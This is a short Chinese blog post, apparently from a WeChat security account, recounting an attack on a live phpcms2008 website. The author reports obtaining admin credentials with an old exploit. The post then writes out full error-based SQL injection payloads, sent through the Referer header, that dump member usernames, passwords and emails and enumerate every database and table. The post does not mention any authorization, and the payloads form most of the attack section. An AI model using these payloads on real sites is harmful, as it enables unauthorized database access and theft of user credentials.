0x01:前因
最近有一个案例是phpcms2008架构的网站,独立服务器,表示压力山大,很久没检测过站,那就来试试把。
0x02:过程
phpcms2008之前是出现过不少漏洞,记得以前也写过这套cms的exp,那我们拿起exp来试试把。居然获取到表的前缀,获取不到管理的帐号很密码。好把 我们再来一次 果断成功。
暂时我们虽然拿到帐号和密码,但是默认登录都被修改过。即使拿到帐号跟密码都没用咯,暂时!!!
如图:
0x03:信息收集
那只能来收集一下信息咯,我想通过这个注入点达到更好的一些数据,看是否存在一些敏感的表,因为这个网站二级目录还有一些敏感的信息。
REFERER:fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x3a,email,0x27,0x7e) from web_member limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#
web_member limit 1,1))将1设置成变量 设置好获取的正则之后我们就可以批量获取 membe的会员如图:
爆所有裤
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#
爆所有表 如图
(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=73715f6a7a6c6e limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#
都转码一下如图
0x04 结束
至此关于burpsuite报错注入就到这里把!!!!!不详细继续深入了 。。。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论